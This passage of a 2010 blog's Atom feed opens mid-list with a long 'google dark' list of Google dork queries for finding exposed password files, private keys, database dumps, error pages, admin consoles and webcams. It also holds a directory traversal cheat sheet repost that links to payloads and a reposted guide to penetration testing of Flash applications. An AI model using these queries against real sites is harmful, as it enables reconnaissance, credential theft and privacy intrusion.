+”OK Attention Trouble”&lt;br /&gt;intitle:”curriculum vitae” filetype:doc&lt;br /&gt;intitle:”edna:streaming mp3 server” -forums&lt;br /&gt;intitle:”FTP root at”&lt;br /&gt;intitle:”index of” +myd size&lt;br /&gt;intitle:”Index Of” -inurl:maillog maillog size&lt;br /&gt;intitle:”Index Of” cookies.txt size&lt;br /&gt;intitle:”index of” mysql.conf OR mysql_config&lt;br /&gt;intitle:”Index of” upload size parent directory&lt;br /&gt;intitle:”index.of *” admin news.asp configview.asp&lt;br /&gt;intitle:”index.of” .diz .nfo last modified&lt;br /&gt;intitle:”Joomla – Web Installer”&lt;br /&gt;intitle:”LOGREP – Log file reporting system” -site:itefix.no&lt;br /&gt;intitle:”Multimon UPS status page”&lt;br /&gt;intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )&lt;br /&gt;intitle:”PhpMyExplorer” inurl:”index.php” -cvs&lt;br /&gt;intitle:”statistics of” “advanced web statistics”&lt;br /&gt;intitle:”System Statistics” +”System and Network Information Center”&lt;br /&gt;intitle:”urchin (5|3|admin)” ext:cgi&lt;br /&gt;intitle:”Usage Statistics for” “Generated by Webalizer”&lt;br /&gt;intitle:”wbem” compaq login “Compaq Information Technologies Group”&lt;br /&gt;intitle:”Web Server Statistics for ****”&lt;br /&gt;intitle:”web server status” SSH Telnet&lt;br /&gt;intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”&lt;br /&gt;intitle:”welcome.to.squeezebox”&lt;br /&gt;intitle:admin intitle:login&lt;br /&gt;intitle:Bookmarks inurl:bookmarks.html “Bookmarks&lt;br /&gt;intitle:index.of “Apache” “server at”&lt;br /&gt;intitle:index.of cleanup.log&lt;br /&gt;intitle:index.of dead.letter&lt;br /&gt;intitle:index.of inbox&lt;br /&gt;intitle:index.of inbox dbx&lt;br /&gt;intitle:index.of ws_ftp.ini&lt;br /&gt;intitle:intranet inurl:intranet +intext:”phone”&lt;br /&gt;inurl:”/axs/ax-admin.pl” -s?ri?t&lt;br /&gt;inurl:”/cricket/grapher.cgi”&lt;br /&gt;inurl:”bookmark.htm”&lt;br /&gt;inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM&lt;br /&gt;inurl:”newsletter/admin/”&lt;br /&gt;inurl:”newsletter/admin/” intitle:”newsletter admin”&lt;br /&gt;inurl:”putty.reg”&lt;br /&gt;inurl:”smb.conf” intext:”workgroup” filetype:conf conf&lt;br /&gt;inurl:*db filetype:mdb&lt;br /&gt;inurl:/cgi-bin/pass.txt&lt;br /&gt;inurl:/_layouts/settings&lt;br /&gt;inurl:admin filetype:xls&lt;br /&gt;inurl:admin intitle:login&lt;br /&gt;inurl:backup filetype:mdb&lt;br /&gt;inurl:build.err&lt;br /&gt;inurl:cgi-bin/printenv&lt;br /&gt;inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”&lt;br /&gt;inurl:changepassword.asp&lt;br /&gt;inurl:ds.py&lt;br /&gt;inurl:email filetype:mdb&lt;br /&gt;inurl:fcgi-bin/echo&lt;br /&gt;inurl:forum filetype:mdb&lt;br /&gt;inurl:forward filetype:forward -cvs&lt;br /&gt;inurl:getmsg.html intitle:hotmail&lt;br /&gt;inurl:log.nsf -gov&lt;br /&gt;inurl:main.php phpMyAdmin&lt;br /&gt;inurl:main.php Welcome to phpMyAdmin&lt;br /&gt;inurl:netscape.hst&lt;br /&gt;inurl:netscape.hst&lt;br /&gt;inurl:netscape.ini&lt;br /&gt;inurl:odbc.ini ext:ini -cvs&lt;br /&gt;inurl:perl/printenv&lt;br /&gt;inurl:php.ini filetype:ini&lt;br /&gt;inurl:preferences.ini “[emule]”&lt;br /&gt;inurl:profiles filetype:mdb&lt;br /&gt;inurl:report “EVEREST Home Edition ”&lt;br /&gt;inurl:server-info “Apache Server Information”&lt;br /&gt;inurl:server-status “apache”&lt;br /&gt;inurl:snitz_forums_2000.mdb&lt;br /&gt;inurl:ssl.conf filetype:conf&lt;br /&gt;inurl:tdbin&lt;br /&gt;inurl:vbstats.php “page generated”&lt;br /&gt;inurl:wp-mail.php + “There doesn’t seem to be any new mail.”&lt;br /&gt;inurl:XcCDONTS.asp&lt;br /&gt;ipsec.conf&lt;br /&gt;ipsec.secrets&lt;br /&gt;ipsec.secrets&lt;br /&gt;Lotus Domino address books&lt;br /&gt;mail filetype:csv -site:gov intext:name&lt;br /&gt;Microsoft Money Data Files&lt;br /&gt;mt-db-pass.cgi files&lt;br /&gt;MySQL tabledata dumps&lt;br /&gt;mystuff.xml – Trillian data files&lt;br /&gt;OWA Public Folders (direct view)&lt;br /&gt;Peoples MSN contact lists&lt;br /&gt;php-addressbook “This is the addressbook for *” -warning&lt;br /&gt;phpinfo()&lt;br /&gt;phpMyAdmin dumps&lt;br /&gt;phpMyAdmin dumps&lt;br /&gt;private key files (.csr)&lt;br /&gt;private key files (.key)&lt;br /&gt;Quicken data files&lt;br /&gt;rdbqds -site:.edu -site:.mil -site:.gov&lt;br /&gt;robots.txt&lt;br /&gt;site:edu admin grades&lt;br /&gt;site:www.mailinator.com inurl:ShowMail.do&lt;br /&gt;SQL data dumps&lt;br /&gt;Squid cache server reports&lt;br /&gt;Unreal IRCd&lt;br /&gt;WebLog Referrers&lt;br /&gt;Welcome to ntop!&lt;br /&gt;Fichier contenant des informations sur le r?seau :&lt;br /&gt;filetype:log intext:”ConnectionManager2″&lt;br /&gt;“apricot – admin” 00h&lt;br /&gt;“by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”&lt;br /&gt;“Network Host Assessment Report” “Internet Scanner”&lt;br /&gt;“Output produced by SysWatch *”&lt;br /&gt;“Phorum Admin” “Database Connection” inurl:forum inurl:admin&lt;br /&gt;phpOpenTracker” Statistics&lt;br /&gt;“powered | performed by Beyond Security’s Automated Scanning” -kazaa -example&lt;br /&gt;“Shadow Security Scanner performed a vulnerability assessment”&lt;br /&gt;“SnortSnarf alert page”&lt;br /&gt;“The following report contains confidential information” vulnerability -search&lt;br /&gt;“The statistics were last upd?t?d” “Daily”-microsoft.com&lt;br /&gt;“this proxy is working fine!” “enter *” “URL***” * visit&lt;br /&gt;“This report lists” “identified by Internet Scanner”&lt;br /&gt;“Traffic Analysis for” “RMON Port * on unit *”&lt;br /&gt;“Version Info” “Boot Version” “Internet Settings”&lt;br /&gt;((inurl:ifgraph “Page generated at”) OR (“This page was built using ifgraph”))&lt;br /&gt;Analysis Console for Incident Databases&lt;br /&gt;ext:cfg radius.cfg&lt;br /&gt;ext:cgi intext:”nrg-” ” This web page was created on ”&lt;br /&gt;filetype:pdf “Assessment Report” nessus&lt;br /&gt;filetype:php inurl:ipinfo.php “Distributed Intrusion Detection System”&lt;br /&gt;filetype:php inurl:nqt intext:”Network Query Tool”&lt;br /&gt;filetype:vsd vsd network -samples -examples&lt;br /&gt;intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm&lt;br /&gt;intitle:”ADSL Configuration page”&lt;br /&gt;intitle:”Azureus : Java BitTorrent Client Tracker”&lt;br /&gt;intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarc’s PC Management products, for large and small companies.”&lt;br /&gt;intitle:”BNBT Tracker Info”&lt;br /&gt;intitle:”Microsoft Site Server Analysis”&lt;br /&gt;intitle:”Nessus Scan Report” “This file was generated by Nessus”&lt;br /&gt;intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”&lt;br /&gt;intitle:”Retina Report” “CONFIDENTIAL INFORMATION”&lt;br /&gt;intitle:”start.managing.the.device” remote pbx acc&lt;br /&gt;intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”&lt;br /&gt;intitle:”twiki” inurl:”TWikiUsers”&lt;br /&gt;inurl:”/catalog.nsf” intitle:catalog&lt;br /&gt;inurl:”install/install.php”&lt;br /&gt;inurl:”map.asp?” intitle:”WhatsUp Gold”&lt;br /&gt;inurl:”NmConsole/Login.asp” | intitle:”Login – Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”&lt;br /&gt;inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo&lt;br /&gt;inurl:/adm-cfgedit.php&lt;br /&gt;inurl:/cgi-bin/finger? “In real life”&lt;br /&gt;inurl:/cgi-bin/finger? Enter (account|host|user|username)&lt;br /&gt;inurl:/counter/index.php intitle:”+PHPCounter 7.*”&lt;br /&gt;inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”&lt;br /&gt;inurl:login.jsp.bak&lt;br /&gt;inurl:ovcgi/jovw&lt;br /&gt;inurl:phpSysInfo/ “created by phpsysinfo”&lt;br /&gt;inurl:portscan.php “from Port”|”Port Range”&lt;br /&gt;inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl&lt;br /&gt;inurl:statrep.nsf -gov&lt;br /&gt;inurl:status.cgi?host=all&lt;br /&gt;inurl:testcgi xitami&lt;br /&gt;inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin&lt;br /&gt;inurl:webutil.pl&lt;br /&gt;Looking Glass&lt;br /&gt;site:netcraft.com intitle:That.Site.Running Apache&lt;br /&gt;“A syntax error has occurred” filetype:ihtml&lt;br /&gt;“access denied for user” “using password”&lt;br /&gt;“An illegal character has been found in the statement” -”previous message”&lt;br /&gt;“ASP.NET_SessionId” “data source=”&lt;br /&gt;“Can’t connect to local” intitle:warning&lt;br /&gt;“Chatologica MetaSearch” “stack tracking”&lt;br /&gt;“detected an internal error [IBM][CLI Driver][DB2/6000]”&lt;br /&gt;“error found handling the request” cocoon filetype:xml&lt;br /&gt;“Fatal error: Call to undefined function” -reply -the -next&lt;br /&gt;“Incorrect syntax near”&lt;br /&gt;“Incorrect syntax near”&lt;br /&gt;“Internal Server Error” “server at”&lt;br /&gt;“Invision Power Board Database Error”&lt;br /&gt;“ORA-00933: SQL command not properly ended”&lt;br /&gt;“ORA-12541: TNS:no listener” intitle:”error occurred”&lt;br /&gt;“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php&lt;br /&gt;“PostgreSQL query failed: ERROR: parser: parse error”&lt;br /&gt;“Supplied argument is not a valid MySQL result resource”&lt;br /&gt;“Syntax error in query expression ” -the&lt;br /&gt;“The s?ri?t whose uid is ” “is not allowed to access”&lt;br /&gt;“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”&lt;br /&gt;“Unable to jump to row” “on MySQL result index” “on line”&lt;br /&gt;“Unclosed quotation mark before the character string”&lt;br /&gt;“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum&lt;br /&gt;“Warning: Cannot modify header information – headers already sent”&lt;br /&gt;“Warning: Division by zero in” “on line” -forum&lt;br /&gt; “Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum&lt;br /&gt;“Warning: mysql_query()” “invalid query”&lt;br /&gt;“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”&lt;br /&gt;“Warning: Supplied argument is not a valid File-Handle resource in”&lt;br /&gt;“Warning:” “failed to open stream: HTTP request failed” “on line”&lt;br /&gt;“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”&lt;br /&gt;“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”&lt;br /&gt;An unexpected token “END-OF-STATEMENT” was found&lt;br /&gt;Coldfusion Error Pages&lt;br /&gt;filetype:asp + “[ODBC SQL”&lt;br /&gt;filetype:asp “Custom Error Message” Category Source&lt;br /&gt;filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”&lt;br /&gt;filetype:php inurl:”logging.php” “Discuz” error&lt;br /&gt;ht://Dig htsearch error&lt;br /&gt;IIS 4.0 error messages&lt;br /&gt;IIS web server error messages&lt;br /&gt;Internal Server Error&lt;br /&gt;intext:”Error Message : Error loading required libraries.”&lt;br /&gt;intext:”Warning: Failed opening” “on line” “include_path”&lt;br /&gt;intitle:”Apache Tomcat” “Error Report”&lt;br /&gt;intitle:”Default PLESK Page”&lt;br /&gt;intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm&lt;br /&gt;intitle:”Error Occurred” “The error occurred in” filetype:cfm&lt;br /&gt;intitle:”Error using Hypernews” “Server Software”&lt;br /&gt;intitle:”Execution of this s?ri?t not permitted”&lt;br /&gt;intitle:”Under construction” “does not currently have”&lt;br /&gt;intitle:Configuration.File inurl:softcart.exe&lt;br /&gt;MYSQL error message: supplied argument….&lt;br /&gt;mysql error with query&lt;br /&gt;Netscape Application Server Error page&lt;br /&gt;ORA-00921: unexpected end of SQL command&lt;br /&gt;ORA-00921: unexpected end of SQL command&lt;br /&gt;ORA-00936: missing expression&lt;br /&gt;PHP application warnings failing “include_path”&lt;br /&gt;sitebuildercontent&lt;br /&gt;sitebuilderfiles&lt;br /&gt;sitebuilderpictures&lt;br /&gt;Snitz! forums db path error&lt;br /&gt;SQL syntax error&lt;br /&gt;Supplied argument is not a valid PostgreSQL result&lt;br /&gt;warning “error on line” php sablotron&lt;br /&gt;Windows 2000 web server error messages&lt;br /&gt;“ftp://” “www.eastgame.net”&lt;br /&gt;“html allowed” guestbook&lt;br /&gt;: vBulletin Version 1.1.5″&lt;br /&gt;“Select a database to view” intitle:”filemaker pro”&lt;br /&gt;“set up the administrator user” inurl:pivot&lt;br /&gt;“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row&lt;br /&gt;“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin&lt;br /&gt;“Welcome to Intranet”&lt;br /&gt;“Welcome to PHP-Nuke” congratulations&lt;br /&gt;“Welcome to the Prestige Web-Based Configurator”&lt;br /&gt;“YaBB SE Dev Team”&lt;br /&gt;“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos&lt;br /&gt;(“Indexed.By”|”Monitored.By”) hAcxFtpScan&lt;br /&gt;(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)&lt;br /&gt;allinurl:”index.php” “site=sglinks”&lt;br /&gt;allinurl:install/install.php&lt;br /&gt;allinurl:intranet admin&lt;br /&gt;filetype:cgi inurl:”fileman.cgi”&lt;br /&gt;filetype:cgi inurl:”Web_Store.cgi”&lt;br /&gt;filetype:php inurl:vAuthenticate&lt;br /&gt;filetype:pl intitle:”Ultraboard Setup”&lt;br /&gt;Gallery in configuration mode&lt;br /&gt;Hassan Consulting’s Shopping Cart Version 1.18&lt;br /&gt;intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -&lt;br /&gt;intitle:”Gateway Configuration Menu”&lt;br /&gt;intitle:”Horde :: My Portal” -”[Tickets”&lt;br /&gt;intitle:”Mail Server CMailServer Webmail” “5.2″&lt;br /&gt;intitle:”MvBlog powered”&lt;br /&gt;intitle:”Remote Desktop Web Connection”&lt;br /&gt;intitle:”Samba Web Administration Tool” intext:”Help Workgroup”&lt;br /&gt;intitle:”Terminal Services Web Connection”&lt;br /&gt;intitle:”Uploader – Uploader v6″ -pixloads.com&lt;br /&gt;intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com&lt;br /&gt;intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”&lt;br /&gt;intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”&lt;br /&gt;inurl:”/NSearch/AdminServlet”&lt;br /&gt;inurl:”index.php? module=ew_filemanager”&lt;br /&gt;inurl:aol*/_do/rss_popup?blogID=&lt;br /&gt;inurl:footer.inc.php&lt;br /&gt;inurl:info.inc.php&lt;br /&gt;inurl:ManyServers.htm&lt;br /&gt;inurl:newsdesk.cgi? inurl:”t=”&lt;br /&gt;inurl:pls/admin_/gateway.htm&lt;br /&gt;inurl:rpSys.html&lt;br /&gt;inurl:search.php vbulletin&lt;br /&gt;inurl:servlet/webacc&lt;br /&gt;natterchat inurl:home.asp -site:natterchat.co.uk&lt;br /&gt;XOOPS Custom Installation&lt;br /&gt;inurl:htpasswd filetype:htpasswd&lt;br /&gt;inurl:yapboz_detay.asp + View Webcam User Accessing&lt;br /&gt;allinurl:control/multiview&lt;br /&gt;inurl:”ViewerFrame?Mode=”&lt;br /&gt;intitle:”WJ-NT104 Main Page”&lt;br /&gt;inurl:netw_tcp.shtml&lt;br /&gt;intitle:”supervisioncam protocol”&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-3823418928491271539?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/3823418928491271539/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=3823418928491271539&amp;isPopup=true' title='2 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3823418928491271539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3823418928491271539'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/google-dark.html' title='google dark'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-1023992817368185464</id><published>2010-08-08T06:42:00.001-07:00</published><updated>2010-08-08T06:42:54.329-07:00</updated><title type='text'>ebay</title><content type='html'>http://cgi.ebay.com/ebaymotors/Ford-F-150-/140436971572&lt;br /&gt;Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 4 in /home1/wheelki1/public_html/server/ad5.php on line 591&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-1023992817368185464?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/1023992817368185464/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=1023992817368185464&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1023992817368185464'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1023992817368185464'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/ebay.html' title='ebay'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-4410183795841373141</id><published>2010-08-08T06:13:00.000-07:00</published><updated>2010-08-08T06:15:58.392-07:00</updated><title type='text'>Directory Traversal Cheat Sheet</title><content type='html'>You can use this cheat sheet for exploiting web servers and application servers for directory traversal.&lt;br /&gt;&lt;br /&gt;This is eight level of deep Directory Traversal. There are 880 variants of Directory Traversal attack signatures.&lt;br /&gt;&lt;br /&gt;To use this list effectively, you need to replace the "(Filename)" phrase to the desired file - Depending by the attacked web server OS.&lt;br /&gt;&lt;br /&gt;Be my guest to suggest more variants to this awesome list.&lt;br /&gt;&lt;br /&gt;Enjoy ;-)&lt;br /&gt;http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-4410183795841373141?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html' title='Directory Traversal Cheat Sheet'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/4410183795841373141/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=4410183795841373141&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/4410183795841373141'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/4410183795841373141'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/directory-traversal-cheat-sheet.html' title='Directory Traversal Cheat Sheet'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-7492719155683825114</id><published>2010-07-27T08:51:00.000-07:00</published><updated>2010-07-27T08:55:05.204-07:00</updated><title type='text'>A Lazy Pen Tester’s Guide to Testing Flash Applications</title><content type='html'>Yesterday, I received a post in the Pen-Test mailing list requesting for tips/resources on penetration testing of flash applications.  While there are some tools and white papers available, I could not find many authoritative resources which wraps the entire spectrum of flash security testing of RIA applications.  So here is an endeavor to detail out the steps of testing.  I will keep this post only to outline the essential steps or points.  Please feel free to recommend additional inclusion of tools and techniques.  The idea is to come up with a comprehensive paper which can be used by pen-testers to test flash based Rich Internet Applications (RIA).&lt;br /&gt;&lt;br /&gt;A short unnecessary introduction on Flash RIA&lt;br /&gt;Adobe Flash (formerly Macromedia Flash) is a multimedia platform originally acquired by Macromedia and currently developed and distributed by Adobe Systems. Since its introduction in 1996, Flash has become a popular method for adding animation and interactivity to web pages. Flash is commonly used to create animation, advertisements, and various web page Flash components, to integrate video into web pages, and more recently, to develop rich Internet applications. Source: en.wikipedia.org/wiki/Adobe_Flash&lt;br /&gt;&lt;br /&gt;Conventionally, RIA developed with Adobe Flash technology consists of a frontend application compiled as an SWF/AIR object to be executed by the Flash Plugin inside the User’s Browser or the AIR Platform installed on the User’s System. This interactive application provides a user Interface to the end-user and in turn communicates with a backend server for its business logic over protocols like HTTP/AMF, HTTP/SOAP, HTTP/REST etc.&lt;br /&gt;&lt;br /&gt;The security angle..&lt;br /&gt;Similar to any widely used web application and software, a RIA can also be a victim of most common and dangerous security Issues. For example, since most Flash based RIAs are backed by an application for its business logic which in turn uses a database, a Flash based RIA might also be vulnerable to common application vulnerabilities like SQL Injection if user input is not sanitized properly. Quite logical huh?. Attackers can also utilize Flash to execute mass exploitation, for example backdoors or malware entirely written in Flash/ActionScript or BOFs against player/plugin or browser.&lt;br /&gt;&lt;br /&gt;It is quite general to deduce that security flaws may also be present in the core environment (which includes the OS and web browsers) that can be exploited regardless of the applications (including Flash Player) running in that environment. A recent paper from Adobe suggests that the approach of Adobe is to implement robust security within its own products while “doing no harm” to the rest of the environment (in other words, to introduce no exposures to the rest of the environment, nor allow any avenues for additional exploitation of any existing platform security weaknesses). This provides a consistently high level of security for what Flash applications can do (as managed within Flash Player), regardless of the platform. Because Adobe products are also designed to be backwards-compatible when possible, some environments may be more vulnerable to weaknesses in the browser or operating system, or have weaker cryptography capabilities. Ultimately, users are responsible for their choices of platforms and maintenance of appropriate operational environments.&lt;br /&gt;&lt;br /&gt;Vulnerabilities in flash RIA can be broadly classified under two categories: client side vulnerabilities and server side vulnerabilities. Let’s review each one of these very quickly:&lt;br /&gt;&lt;br /&gt;Client Side Vulnerabilities:&lt;br /&gt;Amongst the various vulnerabilities that might affect a Flash Application on the client side, some of the most common ones are:&lt;br /&gt;&lt;br /&gt;Flash parameter Injection: It might be possible for an attacker can inject global Flash parameters when the movie is embedded in a parent HTML page. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. There is nice detailed paper by the IBM Rational guys on this vulnerability. You can download it here.&lt;br /&gt;&lt;br /&gt;Cross Domain Privilege Escalation: Cross Domain inter-mixing of content and data is done based on access policy defined in crossdomain.xml of the serving domain for the SWF object. If the access policy is too open, then under certain circumstances, it might be possible for an attacker to supersede the original SWF object with his own malicious version or access the DOM of the hosting domain.&lt;br /&gt;&lt;br /&gt;Cross Site Scripting: Depending on access policy, a Flash SWF can access its host DOM for various functional use cases. A Flash SWF can in turn modify the DOM of its host and if it does so based on un-sanitized user input, it might be possible to perform a conventional XSS attack on the host DOM.&lt;br /&gt;&lt;br /&gt;Cross Site Flashing: Cross Site Flash (XSF) occurs when an SWF objects loads another SWF Object.  This attack could result in XSS or in the modification of the GUI in order to fool a user to insert credentials on a fake flash form.  XSF could be used in the presence of Flash HTML Injection or external SWF files when loadMovie methods are used. OWASP has a testing guide for XSF. Although not comprehensive, still it is a very good point to start. Read it here.&lt;br /&gt;&lt;br /&gt;Server Side Vulnerabilities&lt;br /&gt;Flash Applications seldom makes remote calls to a backend server for various operations like looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. Flash Applications built with Adobe Flex SDK usually use AMF Objects exchanged over HTTP Protocol as a method of communication. AMF Remoting calls are essentially RPC like calls where the Flash Application is calling a given method defined on the server on a specific AMF Endpoint. An attacker can intercept and tamper the AMF data to compromise the server.&lt;br /&gt;&lt;br /&gt;In most of the cases the application server responsible for providing Business Logic to a Flash RIA frontend is a standard web application and can be affected by the very same vulnerabilities as any other web application like as described by the WASC Threat Classification Project.&lt;br /&gt;&lt;br /&gt;Testing Flash Applications: Objectives and Approach&lt;br /&gt;A Flash Security Testing exercise for a Flash Based RIA is conducted with the following objectives:&lt;br /&gt;&lt;br /&gt;Identify the application entry points and test for possible vulnerabilities in the SWF Object itself. &lt;br /&gt;Identify the remote server with which the application might communicate for its business logic requirements. &lt;br /&gt;Identify the protocol with which the SWF Object is communicating with its back-end server. In most of the cases, the protocol will either be SOAP/REST or AMF. &lt;br /&gt;Identify and enumerate all the functionalities exposed by the back-end application. &lt;br /&gt;Penetration Testing of the individual functionalities exposed by the back-end application for standard application security vulnerabilities. &lt;br /&gt;Client Side Testing&lt;br /&gt;Client side primarily relates to static analysis of the flash application. The idea of static analysis of a Flash SWF Object is to decompile the SWF file and attempt to do a white box testing approach by looking into the source code of the Flash SWF File. Basic approach to test client side vulnerabilities is :&lt;br /&gt;&lt;br /&gt;Decompile SWF files into source code (ActionScript) and statically analyzes it to identify security issues such as information disclosure (hard coded). &lt;br /&gt;Audit third party applications without requiring access to the source code. &lt;br /&gt;Common vulnerabilities includes hard coded login credentials, internal IP disclosure, etc. &lt;br /&gt;Apart from analyzing the SWF file, it is also important to analyze the code responsible for generating the HTML file that embeds the SWF object. Under certain circumstances in might be possible to manipulate the FlashVars variable through which SWF inputs can be influenced. &lt;br /&gt;There are however automated tools like HP SWFScan available to do this job upto a certain degree.&lt;br /&gt;&lt;br /&gt;Server Side Testing&lt;br /&gt;The best straightforward way to do a server side testing for flash based RIA applications are as follows:&lt;br /&gt;&lt;br /&gt;1. Extract Gateway&lt;br /&gt;&lt;br /&gt;Load the flash e.g http://foo.com/bar.swf in a browser with service capture/burp proxy/charlesproxy running . &lt;br /&gt;Decompile the SWF using swfdump and grep the gateway patterns. Also get a list of all the urls in SWFdump. &lt;br /&gt;2.  Enumerate service/methods&lt;br /&gt;&lt;br /&gt;Try amfphp.DiscoveryService on all gateways using Pinta. &lt;br /&gt;Use Pinta for AMF calling even if the services and methods are manually entered and hence can be helpful in testing remote methods. &lt;br /&gt;If it fails try extracting them using regex from SWFDump using the following regular expression.&lt;br /&gt;Services:&lt;br /&gt;&lt;br /&gt;–"\"([a-zA-Z0-9_]*)\"“ with filter as “service” (conventional)–"destination id=\"([\\w\\d]*)\"“3.  Make AMF calls&lt;br /&gt;&lt;br /&gt;Use Pinta to call remote methods using different test parameters. &lt;br /&gt;Single quote (SQL injection), neighbor parameters (Direct Object Reference). &lt;br /&gt;Testing the backend application once the exposed functionalities are enumerated should be more or less conventional to standard web application security testing methodology just that a different protocol (AMF serialized calls in this case) is used for interacting with the server and invoking the functionalities.&lt;br /&gt;&lt;br /&gt;Checklist of Vulnerabilities to be tested&lt;br /&gt;Cross Site Scripting &lt;br /&gt;Malicious Data Injection &lt;br /&gt;Insufficient Authorization Restrictions &lt;br /&gt;Secure Transmission &lt;br /&gt;SWF Information Leak &lt;br /&gt;Minimum Stage Size for Anti-ClickJacking &lt;br /&gt;SWF Control Permission &lt;br /&gt;Untrusted SWF in Same Domain &lt;br /&gt;Clickjacking &lt;br /&gt;Privilege Seperation &lt;br /&gt;Cross Domain Policy Audit &lt;br /&gt;Uninitialized Variable Scanning &lt;br /&gt;Remote Method Enumeration &lt;br /&gt;Business Logic Testing &lt;br /&gt;This is a brief guide to testing flash applications. Comments are welcome to make it better and more comprehensive. At the end, we intend to publish a freely available whitepaper to pen testers for testing flash based RIA. Additional sections included in the paper will also carry due credits as received in the comments section below.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt&lt;br /&gt;&lt;br /&gt;http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-7492719155683825114?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/' title='A Lazy 